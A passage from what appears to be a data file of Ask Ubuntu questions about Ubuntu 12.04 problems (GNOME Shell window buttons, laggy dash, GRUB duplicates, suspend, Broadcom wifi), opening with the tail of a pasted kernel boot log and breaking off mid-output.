0.351450 ] pcieport 0000:00:01.0 : setting latency timer to 64 [ 0.351502 ] pcieport 0000:00:01.0 : irq 40 for msi/msi-x [ 0.351585 ] pcieport 0000:00:1c.0 : setting latency timer to 64 [ 0.351639 ] pcieport 0000:00:1c.0 : irq 41 for msi/msi-x [ 0.351728 ] pcieport 0000:00:1c.4 : setting latency timer to 64 [ 0.351779 ] pcieport 0000:00:1c.4 : irq 42 for msi/msi-x [ 0.351875 ] pcieport 0000:00:1c.5 : setting latency timer to 64 [ 0.351927 ] pcieport 0000:00:1c.5 : irq 43 for msi/msi-x [ 0.352094 ] pci_hotplug : pci hot plug pci core version : 0.5 [ 0.352143 ] pciehp : pci express hot plug controller driver version : 0.4 [ 0.352311 ] intel_idle : mwait substates : 0x22220 [ 0.352315 ] intel_idle : does not run on family 6 model 23 [ 0.352446 ] input : power button as /devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0 [ 0.352455 ] acpi : power button [ pwrb ] [ 0.352556 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input1 [ 0.352562 ] acpi : power button [ pwrf ] [ 0.352650 ] acpi : fan [ fan ] ( on ) [ 0.355667 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 0.355673 ] acpi : thermal zone [ thrm ] ( 26 c ) [ 0.355750 ] erst : table is not found ! [ 0.355753 ] ghes : hest is not enabled ! [ 0.355898 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 0.376332 ] serial8250 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 0.376582 ] isapnp : scanning for pnp cards ... [ 0.709133 ] freeing initrd memory : 13792k freed [ 0.729743 ] isapnp : no plug & play device found [ 0.816786 ] 00:07 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 0.832385 ] linux agpgart interface v0.103 [ 0.835605 ] brd : module loaded [ 0.837138 ] loop : module loaded [ 0.837452 ] ata_piix 0000:00:1f.2 : version 2.13 [ 0.837473 ] ata_piix 0000:00:1f.2 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 0.837480 ] ata_piix 0000:00:1f.2 : map [ p0 p2 p1 p3 ] [ 0.837546 ] ata_piix 0000:00:1f.2 : setting latency timer to 64 [ 0.838099 ] scsi0 : ata_piix [ 0.838253 ] scsi1 : ata_piix [ 0.839183 ] ata1 : sata max udma/133 cmd 0xf900 ctl 0xf800 bmdma 0xf500 irq 19 [ 0.839192 ] ata2 : sata max udma/133 cmd 0xf700 ctl 0xf600 bmdma 0xf508 irq 19 [ 0.839239 ] ata_piix 0000:00:1f.5 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 0.839246 ] ata_piix 0000:00:1f.5 : map [ p0 -- p1 -- ] [ 0.839300 ] ata_piix 0000:00:1f.5 : setting latency timer to 64 [ 0.839708 ] scsi2 : ata_piix [ 0.839841 ] scsi3 : ata_piix [ 0.840301 ] ata3 : sata max udma/133 cmd 0xf200 ctl 0xf100 bmdma 0xee00 irq 19 [ 0.840308 ] ata4 : sata max udma/133 cmd 0xf000 ctl 0xef00 bmdma 0xee08 irq 19 [ 0.840429 ] pata_acpi 0000:03:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.840467 ] pata_acpi 0000:03:00.0 : setting latency timer to 64 [ 0.840488 ] pata_acpi 0000:03:00.0 : pci int a disabled [ 0.841159 ] fixed mdio bus : probed [ 0.841205 ] tun : universal tun/tap device driver , 1.6 [ 0.841210 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 0.841322 ] ppp generic driver version 2.4.2 [ 0.841515 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.841542 ] ehci_hcd 0000:00:1a.7 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.841567 ] ehci_hcd 0000:00:1a.7 : setting latency timer to 64 [ 0.841573 ] ehci_hcd 0000:00:1a.7 : ehci host controller [ 0.841658 ] ehci_hcd 0000:00:1a.7 : new usb bus registered , assigned bus number 1 [ 0.845582 ] ehci_hcd 0000:00:1a.7 : cache line size of 4 is not supported [ 0.845610 ] ehci_hcd 0000:00:1a.7 : irq 18 , io mem 0xfdfff000 [ 0.860022 ] ehci_hcd 0000:00:1a.7 : usb 2.0 started , ehci 1.00 [ 0.860264 ] hub 1-0:1.0 : usb hub found [ 0.860272 ] hub 1-0:1.0 : 6 ports detected [ 0.860404 ] ehci_hcd 0000:00:1d.7 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.860424 ] ehci_hcd 0000:00:1d.7 : setting latency timer to 64 [ 0.860430 ] ehci_hcd 0000:00:1d.7 : ehci host controller [ 0.860512 ] ehci_hcd 0000:00:1d.7 : new usb bus registered , assigned bus number 2 [ 0.864413 ] ehci_hcd 0000:00:1d.7 : cache line size of 4 is not supported [ 0.864438 ] ehci_hcd 0000:00:1d.7 : irq 23 , io mem 0xfdffe000 [ 0.880021 ] ehci_hcd 0000:00:1d.7 : usb 2.0 started , ehci 1.00 [ 0.880227 ] hub 2-0:1.0 : usb hub found [ 0.880234 ] hub 2-0:1.0 : 6 ports detected [ 0.880369 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.880396 ] uhci_hcd : usb universal host controller interface driver [ 0.880431 ] uhci_hcd 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.880443 ] uhci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 0.880449 ] uhci_hcd 0000:00:1a.0 : uhci host controller [ 0.880529 ] uhci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 3 [ 0.880574 ] uhci_hcd 0000:00:1a.0 : irq 16 , io base 0x0000ff00 [ 0.880803 ] hub 3-0:1.0 : usb hub found [ 0.880811 ] hub 3-0:1.0 : 2 ports detected [ 0.880929 ] uhci_hcd 0000:00:1a.1 : pci int b - > gsi 21 ( level , low ) - > irq 21 [ 0.880940 ] uhci_hcd 0000:00:1a.1 : setting latency timer to 64 [ 0.880946 ] uhci_hcd 0000:00:1a.1 : uhci host controller [ 0.881039 ] uhci_hcd 0000:00:1a.1 : new usb bus registered , assigned bus number 4 [ 0.881081 ] uhci_hcd 0000:00:1a.1 : irq 21 , io base 0x0000fe00 [ 0.881302 ] hub 4-0:1.0 : usb hub found [ 0.881310 ] hub 4-0:1.0 : 2 ports detected [ 0.881427 ] uhci_hcd 0000:00:1a.2 : pci int d - > gsi 19 ( level , low ) - > irq 19 [ 0.881438 ] uhci_hcd 0000:00:1a.2 : setting latency timer to 64 [ 0.881443 ] uhci_hcd 0000:00:1a.2 : uhci host controller [ 0.881523 ] uhci_hcd 0000:00:1a.2 : new usb bus registered , assigned bus number 5 [ 0.881551 ] uhci_hcd 0000:00:1a.2 : irq 19 , io base 0x0000fd00 [ 0.881774 ] hub 5-0:1.0 : usb hub found [ 0.881781 ] hub 5-0:1.0 : 2 ports detected [ 0.881899 ] uhci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.881910 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 0.881915 ] uhci_hcd 0000:00:1d.0 : uhci host controller [ 0.881993 ] uhci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 6 [ 0.882021 ] uhci_hcd 0000:00:1d.0 : irq 23 , io base 0x0000fc00 [ 0.882244 ] hub 6-0:1.0 : usb hub found [ 0.882252 ] hub 6-0:1.0 : 2 ports detected [ 0.882370 ] uhci_hcd 0000:00:1d.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 0.882381 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 0.882386 ] uhci_hcd 0000:00:1d.1 : uhci host controller [ 0.882467 ] uhci_hcd 0000:00:1d.1 : new usb bus registered , assigned bus number 7 [ 0.882495 ] uhci_hcd 0000:00:1d.1 : irq 19 , io base 0x0000fb00 [ 0.882735 ] hub 7-0:1.0 : usb hub found [ 0.882742 ] hub 7-0:1.0 : 2 ports detected [ 0.882858 ] uhci_hcd 0000:00:1d.2 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.882869 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 0.882875 ] uhci_hcd 0000:00:1d.2 : uhci host controller [ 0.882954 ] uhci_hcd 0000:00:1d.2 : new usb bus registered , assigned bus number 8 [ 0.882982 ] uhci_hcd 0000:00:1d.2 : irq 18 , io base 0x0000fa00 [ 0.883205 ] hub 8-0:1.0 : usb hub found [ 0.883213 ] hub 8-0:1.0 : 2 ports detected [ 0.883435 ] usbcore : registered new interface driver libusual [ 0.883535 ] i8042 : pnp : no ps/2 controller found . probing ports directly . [ 0.883926 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 0.883936 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 0.884187 ] mousedev : ps/2 mouse device common for all mice [ 0.884433 ] rtc_cmos 00:03 : rtc can wake from s4 [ 0.884582 ] rtc_cmos 00:03 : rtc core : registered rtc_cmos as rtc0 [ 0.884612 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs [ 0.884719 ] device-mapper : uevent : version 1.0.3 [ 0.884854 ] device-mapper : ioctl : 4.22.0-ioctl ( 2011-10-19 ) initialised : dm-devel @ redhat.com [ 0.884917 ] eisa : probing bus 0 at eisa.0 [ 0.884921 ] eisa : can not allocate resource for mainboard [ 0.884925 ] can not allocate resource for eisa slot 1 [ 0.884929 ] can not allocate resource for eisa slot 2 [ 0.884932 ] can not allocate resource for eisa slot 3 [ 0.884936 ] can not allocate resource for eisa slot 4 [ 0.884940 ] can not allocate resource for eisa slot 5 [ 0.884943 ] can not allocate resource for eisa slot 6 [ 0.884947 ] can not allocate resource for eisa slot 7 [ 0.884950 ] can not allocate resource for eisa slot 8 [ 0.884954 ] eisa : detected 0 cards . [ 0.884969 ] cpufreq-nforce2 : no nforce2 chipset . [ 0.884973 ] cpuidle : using governor ladder [ 0.884976 ] cpuidle : using governor menu [ 0.884980 ] efi variables facility v0.08 2004-may-17 [ 0.885476 ] tcp cubic registered [ 0.885708 ] net : registered protocol family 10 [ 0.886771 ] net : registered protocol family 17 [ 0.886799 ] registering the dns_resolver key type [ 0.886837 ] using ipi no-shortcut mode [ 0.887028 ] pm : hibernation image not present or could not be loaded . [ 0.887047 ] registered taskstats version 1 [ 0.902579 ] magic number : 12:339:388 [ 0.902592 ] usb usb6 : hash matches [ 0.902687 ] rtc_cmos 00:03 : setting system clock to 2012-05-11 16:23:41 utc ( 1336753421 ) [ 0.903185 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 0.903189 ] edd information not available . [ 1.170710 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) [ 1.181439 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) [ 1.288020 ] refined tsc clocksource calibration : 2499.999 mhz . [ 1.288028 ] switching to clocksource tsc [ 1.292016 ] usb 1-5 : new high-speed usb device number 3 using ehci_hcd [ 1.486745 ] ata2.00 : sata link down ( sstatus 0 scontrol 300 ) [ 1.486762 ] ata2.01 : sata link down ( sstatus 0 scontrol 300 ) [ 1.640115 ] ata1.00 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.640130 ] ata1.01 : sata link down ( sstatus 0 scontrol 300 ) [ 1.648342 ] ata1.00 : ata-7 : maxtor 7y250m0 , yar511w0 , max udma/133 [ 1.648348 ] ata1.00 : 490234752 sectors , multi 0 : lba48 [ 1.664325 ] ata1.00 : configured for udma/133 [ 1.664531 ] scsi 0:0:0:0 : direct-access ata maxtor 7y250m0 yar5 pq : 0 ansi : 5 [ 1.664745 ] sd 0:0:0:0 : [ sda ] 490234752 512-byte logical blocks : ( 251 gb/233 gib ) [ 1.664809 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 1.664838 ] sd 0:0:0:0 : [ sda ] write protect is off [ 1.664843 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 1.664884 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.691699 ] sda : sda1 sda2 sda3 sda4 [ 1.692348 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 1.692461 ] freeing unused kernel memory : 740k freed [ 1.692820 ] write protecting the kernel text : 5828k [ 1.692851 ] write protecting the kernel read-only data : 2376k [ 1.692854 ] nx-protecting the kernel data : 4412k [ 1.723980 ] udevd [ 92 ] : starting version 175 [ 1.865339 ] floppy drive ( s ) : fd0 is 1.44m [ 1.865429 ] pata_jmicron 0000:03:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1.865478 ] pata_jmicron 0000:03:00.0 : setting latency timer to 64 [ 1.867875 ] sky2 : driver version 1.30 [ 1.867926 ] sky2 0000:04:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 1.867942 ] sky2 0000:04:00.0 : setting latency timer to 64 [ 1.867979 ] sky2 0000:04:00.0 : yukon-2 ec chip revision 2 [ 1.868111 ] sky2 0000:04:00.0 : irq 44 for msi/msi-x [ 1.868174 ] scsi4 : pata_jmicron [ 1.869802 ] sky2 0000:04:00.0 : eth0 : addr 00:01:29 : a4:16:0a [ 1.869828 ] scsi5 : pata_jmicron [ 1.869943 ] ata5 : pata max udma/100 cmd 0xdf00 ctl 0xde00 bmdma 0xdb00 irq 16 [ 1.869949 ] ata6 : pata max udma/100 cmd 0xdd00 ctl 0xdc00 bmdma 0xdb08 irq 16 [ 1.880053 ] usb 4-1 : new full-speed usb device number 2 using uhci_hcd [ 1.884052 ] fdc 0 is a post-1991 82077 [ 2.032611 ] ata5.00 : atapi : _nec dvd+/-rw nd-3450a , 103c , max udma/33 [ 2.048585 ] ata5.00 : configured for udma/33 [ 2.049777 ] scsi 4:0:0:0 : cd-rom _nec dvd+-rw nd-3450a 103c pq : 0 ansi : 5 [ 2.051048 ] sr0 : scsi3-mmc drive : 48x/48x writer cd/rw xa/form2 cdda tray [ 2.051054 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.051283 ] sr 4:0:0:0 : attached scsi cd-rom sr0 [ 2.051483 ] sr 4:0:0:0 : attached scsi generic sg1 type 5 [ 2.079838 ] usbcore : registered new interface driver usbhid [ 2.079844 ] usbhid : usb hid core driver [ 2.236660 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 12.150230 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 12.177342 ] udevd [ 333 ] : starting version 175 [ 12.195524 ] adding 417684k swap on /dev/sda2 . priority : -1 extents:1 across:417684k [ 12.278032 ] lp : driver loaded but no devices found [ 12.516456 ] logitech-djreceiver 0003:046d : c52b.0003 : hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1a.1-1/input2 [ 12.520297 ] input : logitech unifying device . wireless pid:1024 as /devices/pci0000:00/0000:00:1a.1/usb4/4-1/4-1:1.2/0003:046d : c52b.0003/input/input2 [ 12.520753 ] logitech-djdevice 0003:046d : c52b.0004 : input , hidraw1 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:1024 ] on usb-0000:00:1a.1-1:1 [ 12.523286 ] input : logitech unifying device . wireless pid:2011 as /devices/pci0000:00/0000:00:1a.1/usb4/4-1/4-1:1.2/0003:046d : c52b.0003/input/input3 [ 12.524439 ] logitech-djdevice 0003:046d : c52b.0005 : input , hidraw2 : usb hid v1.11 keyboard [ logitech unifying device . wireless pid:2011 ] on usb-0000:00:1a.1-1:2 [ 12.545746 ] type=1400 audit ( 1336771433.137:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=502 comm= '' apparmor_parser '' [ 12.546574 ] type=1400 audit ( 1336771433.137:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=502 comm= '' apparmor_parser '' [ 12.547034 ] type=1400 audit ( 1336771433.137:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=502 comm= '' apparmor_parser '' [ 12.626869 ] linux video capture interface : v2.00 [ 12.649104 ] uvcvideo : found uvc 1.00 device < unnamed > ( 046d:081a ) [ 12.668665 ] input : uvc camera ( 046d:081a ) as /devices/pci0000:00/0000:00:1a.7/usb1/1-5/1-5:1.0/input/input4 [ 12.668909 ] usbcore : registered new interface driver uvcvideo [ 12.668914 ] usb video class driver ( 1.1.1 ) [ 12.697645 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 12.697721 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x [ 12.697760 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 12.706772 ] nvidia : module license 'nvidia ' taints kernel . [ 12.706778 ] disabling lock debugging due to kernel taint [ 12.735428 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 13.350252 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 13.350267 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 13.350275 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 13.351464 ] nvrm : loading nvidia unix x86 kernel module 295.40 thu apr 5 21:28:09 pdt 2012 [ 13.356785 ] hda_codec : alc889a : bios auto-probing . [ 13.357267 ] init : failsafe main process ( 658 ) killed by term signal [ 13.372756 ] input : hda intel line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input5 [ 13.373173 ] input : hda intel front mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input6 [ 13.373568 ] input : hda intel rear mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 13.373954 ] input : hda intel front headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 13.374339 ] input : hda intel line-out side as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 13.374715 ] input : hda intel line-out clfe as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 13.375109 ] input : hda intel line-out surround as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 13.375724 ] input : hda intel line-out front as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 13.475252 ] type=1400 audit ( 1336771434.065:5 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=735 comm= '' apparmor_parser '' [ 13.477026 ] type=1400 audit ( 1336771434.069:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=735 comm= '' apparmor_parser '' [ 13.477695 ] type=1400 audit ( 1336771434.069:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=735 comm= '' apparmor_parser '' [ 13.479048 ] type=1400 audit ( 1336771434.069:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=734 comm= '' apparmor_parser '' [ 13.488994 ] type=1400 audit ( 1336771434.081:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=738 comm= '' apparmor_parser '' [ 13.489972 ] type=1400 audit ( 1336771434.081:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=738 comm= '' apparmor_parser '' [ 13 .
125765	how do i add minimize / maximize buttons to gnome shell windows ?	just installed ubuntu 12.04 , then i did sudo apt-get install gnome-shell and windows have only a close button , how can i enable minimize / maximize ? the old gconf-editor does n't seem to work cause it has the three buttons in the config .
125775	unresponsive/laggy dash with an intel video card that shows up as `` unknown ''	i did a clean install of ubuntu 12.04 about three hours ago . now i 've been installing all the programs i use , etc ... however , i seem to be having a problem with a very laggy dash , to the point where it 's almost completely unresponsive . when i open the dash and search for a program like firefox , as i type firefox the letters come about a second after i push the key , and the whole system starts to freeze up . when i try to highlight a program i recently used the mouse literally skips across the screen as if the screen cant keep up with it . is anyone else having similar problems ? also , i know this is a longshot , but could any programs i have installed slow down my system ? i 'd love to get this sorted out , because it 's a pain to have such an unresponsive menu , and i really do n't want to use gnome 3.4 . the problem is it does n't `` know '' what my graphics driver is . which is clearly a problem , how can i fix this ? according to ubuntu 11.10 i had intel ironlake mobile graphics , according to this i have nothing . ( did n't have this problem in ubuntu 11.10 ) system info : intel core i3 cpu m370 2.40ghz 3gb of installed ram 64 bit ubuntu intel ironlake mobile graphics anything else needed ?
125777	duplicate grub menu in ubuntu 12.04	i have a problem with my laptop grub menu . duplicate menu appears as below : found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic how to remove duplicates ? i use ubuntu 12.04 .
125778	why wo n't thunderbird report notifications to the indicator-applet on 12.04 ?	just upgraded to 12.04 from 11.04 , using the default unity desktop . i do n't seem to be getting anything from the messaging indicator applet . i 'm running all the default things that i installed this morning : thunderbird 11.01 with global menu bar integration 3.2 and messaging menu and unity integration 0.9.3 . i go preferences - > when new message arrives - > show an alert , play sound . but nothing happens . no sound , no notification , no change in color of the messaging indicator , but thunderbird clearly shows new messages . i tried installing notification-daemon but that did n't do anything either , even after another restart . any suggestions ?
125781	does the new `` privacy '' button have a log ?	i was just wondering if there was a log that shows exactly what the various applications are taking a history of ?
125786	keyboard not working on boot	i have read other related threads , but none quite seem like this . i upgrade to 12.04 today and every time i boot , the keyboard stops working . it works in grub and bios , but as soon as i am to the login screen , the keyboard looks like it is n't even running with the numlock key not lit up . the only way to fix this is to unplug and replug the keyboard . it is a usb keyboard , though i also have a separate usb mouse that works fine .
125789	12.04 freezing up	i 'm using a new ao722 ( acer aspire ) , new usb and ubuntu is booting into both the desktop and the installer but after a minute everything freezes . i checked the md5sum , using the 32bit iso . not sure of anything else i can provide .
125791	ubuntu 11.10 not suspending automatically	new : after digging around a bit more , i found out the problem is much more that the system is not suspending on its own , although suspending manually ( shutdown- > suspend ) works well . i used the suspend after 5 mins setting on both ac and power from the power settings menu . the only `` solution '' i could find for that problem was linked from another thread : http : //thecodecentral.com/2011/01/18/fix-ubuntu-10-10-suspendhibernate-not-working-bug did not work for me . old : if i manually ( with gconf-editor ) set sleep-inactive-timeout to another value other than the 5/10/3/1 from the power manager , the settings will be ignored ( = no suspending at all ) . i set it to 10 and waited 20 seconds . tried logging in/out and rebooting still the same . also restarted ( killed ) the gnome-settings-daemon , still the same . am i missing something ? if i understand it correctly the gnome-power-daemon ( or whatever the name was in older releases ) is now completely replaced by the gnome-settings-daemon . or am i missing an additional package ? here comes all my settings-daemon dconf-settings : org.gnome.settings-daemon.plugins.power active true org.gnome.settings-daemon.plugins.power button-hibernate 'hibernate' org.gnome.settings-daemon.plugins.power button-power 'interactive' org.gnome.settings-daemon.plugins.power button-sleep 'suspend' org.gnome.settings-daemon.plugins.power button-suspend 'suspend' org.gnome.settings-daemon.plugins.power critical-battery-action 'hibernate' org.gnome.settings-daemon.plugins.power idle-brightness 30 org.gnome.settings-daemon.plugins.power idle-dim-ac false org.gnome.settings-daemon.plugins.power idle-dim-battery true org.gnome.settings-daemon.plugins.power idle-dim-time 10 org.gnome.settings-daemon.plugins.power lid-close-ac-action 'suspend' org.gnome.settings-daemon.plugins.power lid-close-battery-action 'suspend' org.gnome.settings-daemon.plugins.power notify-perhaps-recall true org.gnome.settings-daemon.plugins.power percentage-action 2 org.gnome.settings-daemon.plugins.power percentage-critical 3 org.gnome.settings-daemon.plugins.power percentage-low 10 org.gnome.settings-daemon.plugins.power priority 1 org.gnome.settings-daemon.plugins.power sleep-display-ac 0 org.gnome.settings-daemon.plugins.power sleep-display-battery 0 org.gnome.settings-daemon.plugins.power sleep-inactive-ac true org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 10 org.gnome.settings-daemon.plugins.power sleep-inactive-ac-type 'suspend' org.gnome.settings-daemon.plugins.power sleep-inactive-battery true org.gnome.settings-daemon.plugins.power sleep-inactive-battery-timeout 10 org.gnome.settings-daemon.plugins.power sleep-inactive-battery-type 'suspend' org.gnome.settings-daemon.plugins.power time-action 120 org.gnome.settings-daemon.plugins.power time-critical 300 org.gnome.settings-daemon.plugins.power time-low 1200 org.gnome.settings-daemon.plugins.power use-time-for-policy true
125792	ability of linking contacts in empathy 3.4 is missing	i have installed ubuntu 12.04 , with empathy 3.4 . i discovered that ability of linking contacts from different networks is missing from context menu . is it bug or i need to install something ?
125794	missing ability to change the size of launcher icons	just installed ubuntu 12.04 , well upgraded would be the correct thing to say . i also downloaded and created a disc of it , which i looked at on my win7 laptop while this desktop was still upgrading ( close to 5 hours to do so ! ) anyway , i noticed while using my disk as live cd that you could change the size of the launcher icons . now that it is installed on this computer , i do n't have that option ... i can only change whether the launcher auto-hides or not . having a problem with xscreensaver as well , but directed that to xscreensaver . could this just be that the upgrade did n't go well ? should i just do a clean install from the disk ( not out of the question , i 'm new to linux ) ? any help would be awesome ! thanks !
125795	fan always on hp pavilion dv6-6195sp	after install ubuntu 12.04 ( fresh install ) on my hp pavilion dv6-6195sp the processor fan itâ´s always on ... can someone help ?
125797	choppy window movement in gnome 3.4	i have been using gnome 3.2 since ubuntu 11.10 was released and it has always been perfectly smooth and performed extremely well , much better than unity . after doing a clean installation of ubuntu 12.04 , gnome 3.4 performs less well . if just one window of a relatively simple application , such as gnome terminal , is opened and moved around , the movement is sometimes very choppy , but the rest of the time it 's perfectly smooth . the times when it 's choppy seem to be when part of the window goes off the bottom or right side of the screen . also , if there are multiple windows open , it is almost always choppy . these facts suggest to me that it 's something to do with the compositor . unity works perfectly smoothly . memory usage is only at about 500-600mb , out of 3gb , even with a few things open . the graphics card is the on-board intel graphics on the core i5 m450 . does anyone have any ideas what might be causing this problem ?
125798	can not pass the login screen after upgrade to 12.04 from 11.10	i just performed the upgrade from ubuntu 11.10 to ubuntu 12.04 lts . the updater downloaded all packages but a few ones that the system said were already installed . when asked for it , i chose to install the new maintainer 's version of grub . now after that my system start up to the login page , some images wo n't load . moreover , after i try to login , the graphical instance does not load , it just sits there showing the mouse pointer and nothing else .
125799	i ca n't connect to internet with a bcm4312	this is my first time with linux ( i am using ubuntu 12.04 ) and i am having trouble connecting to internte . i read some post and i did the following , if anybody knows what could be happening i will be very greatful ! ! ! i 've enter lspci -vvv and the result was : > 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 > pci-e fast ethernet controller ( rev 13 ) subsystem : dell device 02aa > control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- > stepping- serr+ fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- > parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- > latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq > 45 region 0 : memory at f68fc000 ( 64-bit , non-prefetchable ) [ size=16k ] > region 2 : i/o ports at de00 [ size=256 ] capabilities : < access denied > > kernel driver in use : sky2 kernel modules : sky2 > > 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g > lp-phy ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card > control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- > stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- > parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- > latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq > 17 region 0 : memory at f69fc000 ( 64-bit , non-prefetchable ) [ size=16k ] > capabilities : < access denied > kernel driver in use : b43-pci-bridge > kernel modules : ssb the i 'd entered sudo lshw -class network with the following result : > *-network > description : network controller > product : bcm4312 802.11b/g lp-phy > vendor : broadcom corporation > physical id : 0 > bus info : pci @ 0000:0c:00.0 > version : 01 > width : 64 bits > clock : 33mhz > capabilities : pm msi pciexpress bus_master cap_list > configuration : driver=b43-pci-bridge latency=0 > resources : irq:17 memory : f69fc000-f69fffff *-network > description : ethernet interface > product : 88e8040 pci-e fast ethernet controller > vendor : marvell technology group ltd. > physical id : 0 > bus info : pci @ 0000:09:00.0 > logical name : eth0 > version : 13 > serial : 00:23 : ae:35:91 : e3 > capacity : 100mbit/s > width : 64 bits > clock : 33mhz > capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation > configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 firmware=n/a latency=0 link=no multicast=yes > port=twisted pair > resources : irq:45 memory : f68fc000-f68fffff ioport : de00 ( size=256 ) *-network disabled > description : wireless interface > physical id : 2 > logical name : wlan0 > serial : 00:24:2c:20 : ce:28 > capabilities : ethernet physical wireless > configuration : broadcast=yes driver=b43 driverversion=3.2.0-23-generic firmware=n/a link=no multicast=yes > wireless=ieee 802.11bg after this i wrote rfkill list all > 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : > dell-wifi : wireless lan soft blocked : yes hard blocked : no then lsmod > module size used by rfcomm 47604 0 > joydev 17693 0 bnep 18281 2 > parport_pc 32866 0 ppdev 17113 0 > bluetooth 180104 10 rfcomm , bnep lp > 17799 0 parport 46562 3 parport_pc , ppdev , lp dell_wmi > 12681 0 sparse_keymap 13890 1 dell_wmi dell_laptop > 18119 0 dcdbas 14490 1 dell_laptop uvcvideo > 72627 0 videodev 98259 1 uvcvideo snd_hda_codec_idt > 70795 1 v4l2_compat_ioctl32 17128 1 videodev psmouse > 87603 0 snd_hda_intel 33773 3 snd_hda_codec > 127706 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13668 > 1 snd_hda_codec arc4 12529 2 serio_raw > 13211 0 snd_pcm 97188 2 